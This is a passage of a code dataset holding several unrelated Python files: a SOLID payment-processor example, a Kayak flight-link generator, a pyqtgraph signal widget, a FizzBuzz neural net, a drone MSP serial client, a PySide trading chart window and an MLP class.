{code}\")\r\n self.authorized = True\r\n \r\n #jeito mais clean de alterar uma variável\r\n def is_authorized(self) -> bool:\r\n return self.authorized\r\n\r\nclass PaymentProcessor(ABC):\r\n @abstractmethod\r\n #tirarmos o security_code dos argumentos obrigatórios\r\n def pay(self, order):\r\n pass\r\n\r\n '''\r\n (4 -> Interface Segregation)\r\n Aqui poderíamos pensar de colocar mais uma abstração dentro\r\n da interface geral, porém isso feriria a segragação de interfaces\r\n @abstractmethod\r\n def auth_sms(self, code):\r\n pass\r\n '''\r\n\r\n#(4 -> Interface segregation)\r\n'''\r\naqui criamos uma interface que faz envio de sms de autenticação\r\nde dois fatores, mas nem todas as classes de pagamento suportam\r\nessa funcionalidade, então, basta criarmos um \"código adicional\"\r\npara a classe abstrata anterior, que forneça a possibilidade de\r\nenviar sms. 
E assim, os processors que suportarem o envio de sms\r\nsimplesmente podem \"herdar\" diretamente dessa interface\r\n'''\r\n'''\r\nÉ uma forma de se separar as interfaces\r\nclass PaymentProcessor_SMS(PaymentProcessor):\r\n @abstractmethod\r\n def auth_sms(self, code):\r\n pass\r\n'''\r\n\r\n#(4 -> Interface segregation utilizando composição)\r\nclass DebitPaymentProcessor(PaymentProcessor):\r\n# (4 -> Interface segregation)\r\n#class DebitPaymentProcessor(PaymentProcessor_SMS): #Já que suporta envio de sms\r\n# (3 -> Liskov) class DebitPaymentProcessor(PaymentProcessor):\r\n #aqui inicializa o security_code como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n #(5 -> Dependency inversion, agora, passamos a classe abstrata Authorizer)\r\n def __init__(self, security_code, authorizer: Authorizer):\r\n #(4 -> Passávamos a classe concreta SMSAuth)\r\n #def __init__(self, security_code, authorizer: SMSAuth):\r\n self.authorizer = authorizer #aqui importa a autorização de SMSAuth\r\n self.security_code = security_code\r\n\r\n def pay(self, order):\r\n if not self.authorizer.is_authorized():\r\n raise Exception(\"Not Authorized\")\r\n print(\"Processing debit payment type\")\r\n print(f\"Verifying security code: {self.security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass CreditPaymentProcessor(PaymentProcessor):\r\n #aqui inicializa o security_code como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n def __init__(self, security_code):\r\n self.security_code = security_code\r\n\r\n def pay(self, order):\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying security code: {self.security_code}\")\r\n order.status = \"paid\"\r\n\r\nclass PayPalPaymentProcessor(PaymentProcessor): #Já que suporta envio de sms\r\n #aqui inicializa o email_address como \"particularidade\" dessa classe\r\n #sem que seja uma obrigação da classe mãe\r\n def __init__(self, email_address, authorizer: SMSAuth):\r\n self.authorizer = authorizer #aqui importa a autorização de SMSAuth\r\n self.email_address = email_address\r\n\r\n def pay(self, order):\r\n if not self.authorizer.is_authorized():\r\n raise Exception(\"Not Authorized\")\r\n print(\"Processing credit payment type\")\r\n print(f\"Verifying email address: {self.email_address}\")\r\n order.status = \"paid\"\r\n\r\norder = Order()\r\norder.add_item(\"Keyboard\", 1, 50);\r\norder.add_item(\"SSD\", 1, 150);\r\norder.add_item(\"USB cable\", 2, 5);\r\n\r\nprint(order.total_price())\r\n#processor = PaymentProcessor() # (1 -> SRP) aqui criamos um processador de pagamentos\r\n# (0) order.pay(\"debit\", \"9099909877\"); -> Vira obsoleto, visto que agora, pagamos com o processor\r\n#(4 -> Interface Segregation utilizando composição)\r\nauthorizer = SMSAuth() \r\nprocessor = DebitPaymentProcessor(\"9099909877\", authorizer) #authorizer que é o autenticador do código sms recebido\r\nauthorizer.verify_code(23234132)\r\n# (3 -> Liskov)\r\n#processor = PayPalPaymentProcessor(\"csk@email.com\") #passa o argumento email address para o PayPalProcessor\r\nprocessor.pay(order) #aqui apenas paga a order\r\n\r\n# (2 -> SRP + OpenClosed)\r\n'''\r\nprocessor = DebitPaymentProcessor() #aqui alteramos apenas a classe que será responsável pelo pagamento\r\nprocessor.pay(order, \"9099909877\") #pay pelo fato de no processor, ser definido o método de pagamento\r\n'''\r\n#(1 -> SRP)\r\n#processor.pay_debit(order, \"9099909877\") # -> Passamos a order pois agora é necessário\r\n\r\n\r\n#Muitas vezes utilzar 
composição ao invés de herança pode ser bem melhor","repo_name":"p3dru/python","sub_path":"solid.py","file_name":"solid.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22896081500","text":"import datetime\nimport sys, getopt\nfrom export_csv import export_list_csv\n\ndef diff_days(a,b):\n '''\n Returns the diference of days\n :param a: like \"2017-12-30\"\n :param b: same\n :return: difference of days as int\n '''\n a = datetime.datetime.strptime(a, \"%Y-%m-%d\")\n b = datetime.datetime.strptime(b, \"%Y-%m-%d\")\n return int((b - a).days)\n\ndef clean_dates(all_dates):\n return all_dates\n\ndef gen_dates_same_month(month, year):\n '''\n :param month: month to generate dates: ie \"03\" is march\n :return: something like [['2017-04-04', '2017-04-05'], ['2017-04-04', '2017-04-12']]\n '''\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n all_dates = []\n date = year + \"-\" + month + \"-04\"\n #dif = diff_days(date, current_date)\n if diff_days(date, current_date) <= 0: # check that today is before the departure date\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 5)]\n #if dif > 0 and dif <= 2:\n\n date = year + \"-\" + month + \"-11\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 4)]\n\n date = year + \"-\" + month + \"-18\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 3)]\n\n date = year + \"-\" + month + \"-25\"\n if diff_days(date, current_date) <= 0:\n all_dates += [[date, (datetime.datetime.strptime(date, \"%Y-%m-%d\") + datetime.timedelta(days=x * 7 + 1)).strftime(\"%Y-%m-%d\")] for x in range(0, 2)]\n\n return all_dates\n\ndef gen_dates_different_month(month_departure, month_return, year_departure, year_return):\n\n '''\n Generates a list of list of dates\n :param month_departure: ie \"03\"\n :param month_return: ie \"04\"\n :return: something like [['2017-03-04', '2017-04-04'], ['2017-04-04', '2017-05-11']]\n '''\n all_dates = []\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n date_departure_base = year_departure + \"-\" + month_departure + \"-04\"\n for i in range(0, 5):\n date_departure = datetime.datetime.strptime(date_departure_base, \"%Y-%m-%d\") + datetime.timedelta(days=i * 7)\n date_return_base = year_return + \"-\" + month_return + \"-04\"\n date_departure_full = date_departure.strftime(\"%Y-%m-%d\")\n if diff_days(date_departure_full, current_date) <= 0: # check that today is before the departure date\n all_dates += [[date_departure_full,(datetime.datetime.strptime(date_return_base, \"%Y-%m-%d\")\n + datetime.timedelta(days=x * 7)).strftime(\"%Y-%m-%d\")] for x in range(0, 5)]\n return all_dates\n\ndef gen_dates_no_return(month_departure, year_departure):\n all_dates = []\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n date_departure_base = year_departure + \"-\" + month_departure + \"-04\"\n for i in range(0, 5):\n date_departure = datetime.datetime.strptime(date_departure_base, \"%Y-%m-%d\") + datetime.timedelta(days=i * 7)\n date_departure_full = date_departure.strftime(\"%Y-%m-%d\")\n if diff_days(date_departure_full, 
current_date) <= 0: # check that today is before the departure date\n            all_dates += [[date_departure_full, \"no-return\"]]\n    return all_dates\n\ndef gen_dates(month_departure, month_return, year_departure, year_return):\n    '''\n    generates the list of lists for departure and return dates\n    :param month_departure: i.e \"03\" for march\n    :param month_return: i.e \"06\" for june\n    they have to be str of two characters\n    :return: list of lists with possible departure dates and return dates in each element\n    i.e [['2017-03-04', '2017-04-04'], ['2017-04-04', '2017-05-11']]\n    '''\n    if month_departure == month_return and year_departure == year_return:\n        return gen_dates_same_month(month_departure, year_departure)\n    if month_return == \"00\":\n        return gen_dates_no_return(month_departure, year_departure)\n    else:\n        return gen_dates_different_month(month_departure, month_return, year_departure, year_return)\n\n\ndef gen_links(dates, airport_departure, airport_arrival, extensions = [\"es\"]):\n    '''\n    creates the links to scrape in the form:\n    https://www.kayak.es/flights/FCO-BKK,KUL/2017-04-11-flexible/2017-07-02-flexible\n    :param dates: list of lists of two elements with departure date and return date in the following form:\n    [[\"2017-02-26\",\"2017-05-30\"], [\"2017-02-26\",\"2017-06-20\"]]\n    :param airport_departure: the code of the departure airport: i.e \"FCO\" or \"LHR\".\n    Also it admits multiple airports at the same time: i.e \"FCO,LHR\"\n    :param airport_arrival: code of the arrival airport i.e \"BKK\" or \"KUL\" or \"BKK,KUL\"\n    :param extensions: list of the extensions of the kayak domains: i.e [\"es\", \"co.uk\", \"it\", \"se\"]\n    :return: the list of links generated\n    '''\n    links = []\n    for extension in extensions:\n        for date in dates:\n            link = \"https://www.kayak.\" + extension + \"/flights/\"+ airport_departure + \"-\" + airport_arrival + \"/\" + date[0] + \"-flexible/\" + date[1] + \"-flexible\"\n            if \"no-return\" in link:\n                links.append(link[:-19])\n            else:\n                links.append(link)\n    return links\n\n\ndef main(argv):\n    month_departure = ''\n    month_return = ''\n    year_departure = ''\n    year_return = ''\n    airport_departure = ''\n    airport_arrival = ''\n    extension = ''\n    name=''\n    try:\n        opts, args = getopt.getopt(argv,\"ha:b:y:z:d:r:e:n:\",[\"month-departure=\",\"month-return=\",\"year-departure=\",\"year-return=\",\"airport-departure=\",\"airport-return=\",\"extension=\",\"name=\"])\n    except getopt.GetoptError:\n        print('Options: \\n '\n              '-e <kayak domain extensions, comma separated, e.g. es,co.uk> \\n'\n              '-a <departure month, two digits> \\n'\n              '-y <departure year> \\n'\n              '-b <return month, two digits, 00 for no return> \\n'\n              '-z <return year> \\n'\n              '-d <departure airport code, or several separated by commas> \\n'\n              '-r <arrival airport code, or several separated by commas> \\n'\n              '-n <name of the output csv> \\n\\n'\n              ' i.e: vuelos.py '\n              '-a 03 -y 2018 -b 04 -z 2018 -d FCO -r BKK,KUL (-b 00 for no return)')\n        sys.exit(2)\n    for opt, arg in opts:\n        if opt == '-h':\n            print('Options: \\n '\n                  '-e <kayak domain extensions, comma separated, e.g. es,co.uk> \\n'\n                  '-a <departure month, two digits> \\n'\n                  '-y <departure year> \\n'\n                  '-b <return month, two digits, 00 for no return> \\n'\n                  '-z <return year> \\n'\n                  '-d <departure airport code, or several separated by commas> \\n'\n                  '-r <arrival airport code, or several separated by commas> \\n'\n                  '-n <name of the output csv> \\n\\n'\n                  ' i.e: vuelos.py '\n                  '-a 03 -y 2018 -b 04 -z 2018 -d FCO -r BKK,KUL (-b 00 for no return)')\n            sys.exit()\n        elif opt in (\"-a\", \"--month-departure\"):\n            month_departure = arg\n        elif opt in (\"-b\", \"--month-return\"):\n            month_return = arg\n        elif opt in (\"-y\", \"--year-departure\"):\n            year_departure = arg\n        elif opt in (\"-z\", \"--year-return\"):\n            year_return = arg\n        elif opt in (\"-d\", \"--airport-departure\"):\n            airport_departure = arg\n        elif opt in (\"-r\", \"--airport-return\"):\n            airport_arrival = arg\n        elif opt in (\"-e\", \"--extension\"):\n            extension = arg\n        elif opt in (\"-n\", \"--name\"):\n            name = arg\n\n\n    dates = gen_dates(month_departure, month_return, year_departure, year_return)\n    links = gen_links(dates, 
airport_departure, airport_arrival, extensions=extension.split(\",\"))\n export_list_csv(links, name)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"xsergiolpx/Flights-Scraper","sub_path":"generate_links_kayak.py","file_name":"generate_links_kayak.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26773315610","text":"import sys\nsys.path.insert(0, '.')\nfrom impl import trampoline # pylint: disable=relative-import,g-import-not-at-top\n\n\nTRAMPOLINE = [\n 'python starboard/tools/testing/test_runner.py',\n '--platform_tests_only',\n '{platform_arg}',\n '{config_arg}',\n '{device_id_arg}',\n '{target_params_arg}',\n]\n\n\ndef _ResolveTrampoline(argv=None):\n if argv == None:\n argv = sys.argv[1:]\n resolved_cmd, unresolve_args = trampoline.ResolveTrampoline(\n TRAMPOLINE, argv=argv)\n return resolved_cmd\n\n\nif __name__ == '__main__':\n trampoline.RunThenExit(_ResolveTrampoline())\n","repo_name":"blockspacer/cobalt-clone-cab7770533804d582eaa66c713a1582f361182d3","sub_path":"src/cobalt/build/cobalt_archive_content/__cobalt_archive/run/run_platform_tests.py","file_name":"run_platform_tests.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39704896061","text":"\"\"\"\nWidgets for plotting multi-channel signals.\n\"\"\"\n\nimport pyqtgraph\n\n\nclass SignalWidget(pyqtgraph.GraphicsLayoutWidget):\n \"\"\"\n Scrolling oscilloscope-like widget for displaying real-time signals.\n\n Intended for multi-channel viewing, each channel gets its own row in the\n widget, and all channels share y-axis zoom.\n \"\"\"\n\n def __init__(self):\n super(SignalWidget, self).__init__()\n\n self.plot_items = []\n self.plot_data_items = []\n\n self.n_channels = 0\n\n self.setBackground(None)\n\n def plot(self, data):\n \"\"\"\n Adds a window of data to the widget.\n\n Previous windows are scrolled to the left, and the new data is added to\n the end.\n\n Parameters\n ----------\n data : ndarray, shape = (n_channels, n_samples)\n Window of data to add to the end of the currently-shown data.\n \"\"\"\n nch, nsamp = data.shape\n if nch != self.n_channels:\n self.n_channels = nch\n self._update_num_channels()\n\n for i, pdi in enumerate(self.plot_data_items):\n pdi.setData(data[i])\n\n def _update_num_channels(self):\n self.clear()\n\n self.plot_items = []\n self.plot_data_items = []\n pen = _MultiPen(self.n_channels)\n for i in range(self.n_channels):\n plot_item = self.addPlot(row=i, col=0)\n plot_data_item = plot_item.plot(pen=pen.get_pen(i), antialias=True)\n\n plot_item.showAxis('bottom', False)\n plot_item.showGrid(y=True, alpha=0.5)\n plot_item.setMouseEnabled(x=False)\n plot_item.setMenuEnabled(False)\n\n if self.n_channels > 1:\n label = \"ch {}\".format(i)\n plot_item.setLabels(left=label)\n\n if i > 0:\n plot_item.setYLink(self.plot_items[0])\n\n self.plot_items.append(plot_item)\n self.plot_data_items.append(plot_data_item)\n\n self.plot_items[0].disableAutoRange(pyqtgraph.ViewBox.YAxis)\n self.plot_items[0].setYRange(-1, 1)\n\n\nclass _MultiPen(object):\n\n MIN_HUE = 160\n HUE_INC = 20\n VAL = 200\n\n def __init__(self, n_colors):\n self.n_colors = n_colors\n self.max_hue = self.MIN_HUE + n_colors*self.HUE_INC\n\n def get_pen(self, index):\n return pyqtgraph.intColor(\n index, hues=self.n_colors,\n minHue=self.MIN_HUE, maxHue=self.max_hue,\n minValue=self.VAL, 
maxValue=self.VAL)\n","repo_name":"axopy/axopy","sub_path":"axopy/gui/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"48"} +{"seq_id":"30365342556","text":"\"\"\"\nFizzBuzz is the following problem:\n\nFor each of the numbers 1 to 100:\n* if the number is divisible by 3, print \"fizz\"\n* if the number is divisible by 5, print \"buzz\"\n* if the number is divisible by 15, print \"fizzbuzz\"\n* otherwise, just print the number\n\"\"\"\nfrom typing import List\n\nimport numpy as np\n\nfrom joelnet.train import train\nfrom joelnet.nn import NeuralNet\nfrom joelnet.layers import Linear, Tanh\nfrom joelnet.optim import SGD\n\ndef fizz_buzz_encode(x: int) -> List[int]:\n if x % 15 == 0:\n return [0, 0, 0, 1]\n elif x % 5 == 0:\n return [0, 0, 1, 0]\n elif x % 3 == 0:\n return [0, 1, 0, 0]\n else:\n return [1, 0, 0, 0]\n\n\ndef binary_encode(x: int) -> List[int]:\n \"\"\"\n 10 digit binary encoding of x\n \"\"\"\n return [x >> i & 1 for i in range(10)]\n\ninputs = np.array([\n binary_encode(x)\n for x in range(101, 1024)\n])\n\ntargets = np.array([\n fizz_buzz_encode(x)\n for x in range(101, 1024)\n])\n\nnet = NeuralNet([\n Linear(input_size=10, output_size=50),\n Tanh(),\n Linear(input_size=50, output_size=4)\n])\n\ntrain(net,\n inputs,\n targets,\n num_epochs=5000,\n optimizer=SGD(lr=0.001))\n\nfor x in range(1, 101):\n predicted = net.forward(binary_encode(x))\n predicted_idx = np.argmax(predicted)\n actual_idx = np.argmax(fizz_buzz_encode(x))\n labels = [str(x), \"fizz\", \"buzz\", \"fizzbuzz\"]\n print(x, labels[predicted_idx], labels[actual_idx])\n","repo_name":"joelgrus/joelnet","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"48"} +{"seq_id":"41543790885","text":"import construct\r\nfrom construct import *\r\nimport serial\r\nimport time\r\nimport structs\r\nimport sys, os\r\n\r\nclass msp:\r\n\r\n def __init__(self, serPort):\r\n\r\n self.ser = serial.Serial()\r\n self.ser.port = serPort\r\n self.ser.baudrate = 115200\r\n self.ser.bytesize = serial.EIGHTBITS\r\n self.ser.parity = serial.PARITY_NONE\r\n self.ser.stopbits = serial.STOPBITS_ONE\r\n self.ser.timeout = 0\r\n self.ser.xonxoff = False\r\n self.ser.rtscts = False\r\n self.ser.dsrdtr = False\r\n self.ser.writeTimeout = 2\r\n \"\"\"Time to wait until the board becomes operational\"\"\"\r\n wakeup = 2\r\n try:\r\n self.ser.open()\r\n for i in range(1, wakeup):\r\n time.sleep(1)\r\n except Exception as error:\r\n print(\"\\n\\nError opening \" + self.ser.port + \" port.\\n\" + str(error) + \"\\n\\n\")\r\n\r\n def sendCMDreceive(self, function, data, plformat):\r\n format = structs.Message.struct\r\n checksumformat= structs.Message.checksumFormat\r\n if data==[]:\r\n payload=data\r\n data_length=0\r\n else:\r\n payload=plformat.build(data)\r\n payload=bytearray(bytes(payload))\r\n data_length=len(bytearray(bytes(payload)))\r\n \r\n \r\n parameters = checksumformat.build(dict(function=function, payloadSize=data_length, payload=payload))\r\n checksum=0\r\n for i in bytearray(bytes(parameters)):\r\n checksum = checkSum(checksum, i)\r\n bytes2 = format.build(dict(function=function, payloadSize=data_length, payload=payload, checksum=checksum))\r\n try:\r\n b = self.ser.write(bytes2)\r\n while True:\r\n header = self.ser.read()\r\n if header != b\"\":\r\n blist = header\r\n if header 
== b'$':\r\n                        while header != b\"\":\r\n                            header = self.ser.read()\r\n                            blist = blist + header\r\n                        break\r\n            format = structs.Message.structRecv\r\n            if ((function==106 and len(blist)!=27) or (function==108 and len(blist)!=15) or (function==109 and len(blist)!=19)):\r\n                return None\r\n            if function==209:\r\n                #print(\"lala \",blist)\r\n                return blist\r\n            #print(blist)\r\n            #print(len(blist),function)\r\n            parsed_data = dict(format.parse(blist))\r\n            blist = parsed_data[\"payload\"]\r\n            payload1=construct.Array(parsed_data[\"payloadSize\"], Int8ub).build(blist)\r\n\r\n            parsed_data = dict(plformat.parse(payload1))\r\n            #print(\"end\")\r\n            #print(parsed_data)\r\n            return parsed_data\r\n\r\n        except Exception as error:\r\n            print(\"\\n\\nError in sendCMDreceive.\")\r\n            exc_type, exc_obj, exc_tb = sys.exc_info()\r\n            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\r\n            print(error,exc_type, fname, exc_tb.tb_lineno)\r\n            return None\r\n\r\ndef getCheckSum(bytes):\r\n    checksum = 0\r\n    for i in bytes:\r\n        checksum = checkSum(checksum, i)\r\n    return checksum\r\n\r\n\r\ndef checkSum(crc, a):\r\n    crc ^= a\r\n    for i in range(0, 8):\r\n\r\n        if crc & 0x80:\r\n            crc = ((crc & 127) << 1) ^ 0xD5\r\n        else:\r\n            crc = (crc & 127) << 1\r\n    return crc\r\n\r\n\r\n","repo_name":"dimitri-silva/PiDrone","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25471347539","text":"from PySide6.QtWidgets import QMainWindow, QLabel\nfrom PySide6.QtCore import QSize\nfrom MPLQTCanvas import MPLQTCanvas\nfrom TradingState import TradingState\nfrom ui.MainFormUI import Ui_MainForm\n\n\ndef ticks_history_recalc_ticks_next_day_notify(main_form, new_date):\n    main_form.set_statusbar_text(\"Calculating ticks {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ticks_percents_next_day_notify(main_form, new_date):\n    main_form.set_statusbar_text(\"Calculating ticks percents {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ticks_points_next_day_notify(main_form, new_date):\n    main_form.set_statusbar_text(\"Calculating ticks points {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_zigzag_next_day_notify(main_form, new_date):\n    main_form.set_statusbar_text(\"Calculating ZigZag {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\ndef ticks_history_recalc_ema_next_day_notify(main_form, new_date):\n    main_form.set_statusbar_text(\"Calculating EMA {:02d}.{:02d}.{:4d}...\".format(new_date.day, new_date.month, new_date.year))\n\n\nclass MainForm(QMainWindow):\n    def __init__(self, application=None):\n        super().__init__()\n\n        self._application = application\n        self._page_scroll_amount = 500\n\n        self.ui = Ui_MainForm()\n        self.ui.setupUi(self)\n\n        #region Status bar initialization\n        self.ui.statusbarText = QLabel()\n        self.ui.statusbar.addPermanentWidget(self.ui.statusbarText, stretch=100)\n        #endregion Status bar initialization\n\n        #region Connect actions\n        self.ui.actionExit.triggered.connect(self.execute_exit_action)\n        self.ui.actionRecalculate_ticks.triggered.connect(self.execute_Recalculate_ticks_action)\n        self.ui.actionRecalculate_ticks_percents.triggered.connect(self.execute_Recalculate_ticks_percents_action)\n        
self.ui.actionRecalculate_ticks_points.triggered.connect(self.execute_Recalculate_ticks_points_action)\n self.ui.actionRecalculate_zigzag.triggered.connect(self.execute_Recalculate_zigzag_action)\n self.ui.actionRecalculate_EMA.triggered.connect(self.execute_Recalculate_EMA_action)\n\n self.ui.PageUpButton.clicked.connect(self.PageUpButton_click)\n self.ui.PageDnButton.clicked.connect(self.PageDnButton_click)\n #endregion Connect actions\n\n #region Charts canvases initialization\n self.ui.ticks_frame_prices_chart_canvas = MPLQTCanvas()\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_prices_chart_canvas)\n\n self.ui.ticks_frame_bid_ask_percents_canvas = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_percents_canvas.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_bid_ask_percents_canvas.setVisible(False)\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_percents_canvas)\n\n self.ui.ticks_frame_bid_ask_percents_neuroinputs = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_percents_neuroinputs.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_bid_ask_percents_neuroinputs.setVisible(False)\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_percents_neuroinputs)\n\n self.ui.ticks_frame_bid_ask_points_canvas = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_points_canvas.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_points_canvas)\n\n self.ui.ticks_frame_bid_ask_points_neuroinputs = MPLQTCanvas()\n self.ui.ticks_frame_bid_ask_points_neuroinputs.setMaximumSize(QSize(16777215, 100))\n self.ui.ticks_frame_chart_layout.addWidget(self.ui.ticks_frame_bid_ask_points_neuroinputs)\n #endregion Charts canvases initialization\n\n #region Trading state initialization\n self.trading_state = TradingState(owner_form=self, symbol=\"EURUSDrfd\", ticks_history_folder=\"history\\AlfaForex\\EURUSDrfd\")\n self.trading_state.load_zigzag(filename_postfix=\"100\")\n self.trading_state.go_to_start()\n #TODO: Provide for a situation when the ticks in the day are smaller than the frame size\n self.trading_state.tick_index = self.trading_state.ticks_frame_size\n #endregion Trading state initialization\n\n self.update_canvases()\n\n def set_statusbar_text(self, text):\n self.ui.statusbarText.setText(text)\n self.ui.statusbarText.repaint()\n if self._application is not None:\n self._application.processEvents()\n\n def clear_status_bar(self):\n self.set_statusbar_text(\"\")\n\n def update_ticks_frame_prices_chart_canvas(self):\n canvas = self.ui.ticks_frame_prices_chart_canvas\n figure = canvas.figure\n axes = figure.gca()\n self.trading_state.plot_ticks_bid_ask_prices(axes=axes, labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_percents_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_percents_canvas\n self.trading_state.plot_ticks_bid_ask_percents(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_points_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_points_canvas\n self.trading_state.plot_ticks_bid_ask_points(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_bid_ask_percents_neuroinputs_chart_canvas(self):\n canvas = self.ui.ticks_frame_bid_ask_percents_neuroinputs\n self.trading_state.plot_ticks_bid_ask_percents_neuroinputs(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_ticks_frame_bid_ask_points_neuroinputs_chart_canvas(self):\n canvas = 
self.ui.ticks_frame_bid_ask_points_neuroinputs\n self.trading_state.plot_ticks_bid_ask_points_neuroinputs(axes=canvas.figure.gca(), labels_and_grid=True)\n canvas.draw()\n\n def update_canvases(self):\n self.update_ticks_frame_prices_chart_canvas()\n\n self.update_ticks_frame_percents_chart_canvas()\n self.update_ticks_frame_bid_ask_percents_neuroinputs_chart_canvas()\n\n self.update_ticks_frame_points_chart_canvas()\n self.update_ticks_frame_bid_ask_points_neuroinputs_chart_canvas()\n\n def ticks_frame_pageup(self):\n self.trading_state.jump_forward(self._page_scroll_amount)\n\n def ticks_frame_pagedn(self):\n self.trading_state.jump_backward(self._page_scroll_amount)\n\n def PageUpButton_click(self):\n self.ticks_frame_pageup()\n self.update_canvases()\n\n def PageDnButton_click(self):\n self.ticks_frame_pagedn()\n self.update_canvases()\n\n def execute_exit_action(self):\n self.close()\n\n def execute_Recalculate_ticks_action(self):\n if self.trading_state._ticks_history.data_files_format() != \".csv\":\n print(\"Ticks history data files format is allready pkl\")\n return\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_next_day_notify\n self.trading_state.recalc_ticks()\n self.clear_status_bar()\n\n def execute_Recalculate_ticks_percents_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_percents_next_day_notify\n self.trading_state.recalc_ticks_percents()\n self.clear_status_bar()\n\n def execute_Recalculate_ticks_points_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ticks_points_next_day_notify\n self.trading_state.recalc_ticks_points()\n self.clear_status_bar()\n\n def execute_Recalculate_zigzag_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_zigzag_next_day_notify\n #TODO: Replace hardcode params in MainForm.execute_Recalculate_zigzag_action()\n self.trading_state.recalc_zigzag(100)\n self.update_ticks_frame_prices_chart_canvas()\n self.clear_status_bar()\n\n def execute_Recalculate_EMA_action(self):\n self.trading_state.next_day_notification = ticks_history_recalc_ema_next_day_notify\n self.trading_state.recalc_ema()\n self.update_ticks_frame_prices_chart_canvas()\n self.clear_status_bar()\n","repo_name":"Alchemist221276/RLTrader","sub_path":"MainForm.py","file_name":"MainForm.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6935733074","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom modules import *\n\nclass MLP(object):\n\n def __init__(self, n_inputs, n_hidden, n_classes):\n \"\"\"\n Initializes multi-layer perceptron object. 
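Hidden layers are built as Linear+ReLU pairs, and the output stage is a Linear layer followed by SoftMax.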
\n Args:\n n_inputs: number of inputs (i.e., dimension of an input vector).\n n_hidden: list of integers, where each integer is the number of units in each linear layer\n n_classes: number of classes of the classification problem (i.e., output dimension of the network)\n \"\"\"\n self.layers = []\n for i in range(len(n_hidden)):\n if i == 0:\n self.layers.append([Linear(n_inputs,n_hidden[0]),ReLU()])\n else:\n self.layers.append([Linear(n_hidden[i-1],n_hidden[i]),ReLU()])\n self.output_layer = [Linear(n_hidden[len(n_hidden)-1],n_classes),SoftMax()]\n\n def forward(self, x):\n \"\"\"\n Predict network output from input by passing it through several layers.\n Args:\n x: input to the network\n Returns:\n out: output of the network\n \"\"\"\n for layer in self.layers:\n x = layer[0].forward(x)\n x = layer[1].forward(x)\n x = self.output_layer[0].forward(x)\n out = self.output_layer[1].forward(x)\n return out\n\n def backward(self, dout):\n \"\"\"\n Performs backward propagation pass given the loss gradients. \n Args:\n dout: gradients of the loss\n \"\"\"\n dou = self.output_layer[1].backward(dout)\n dou = self.output_layer[0].backward(dou)\n for i in range(len(self.layers)):\n dou = self.layers[-i-1][1].backward(dou)\n dou = self.layers[-i-1][0].backward(dou)\n 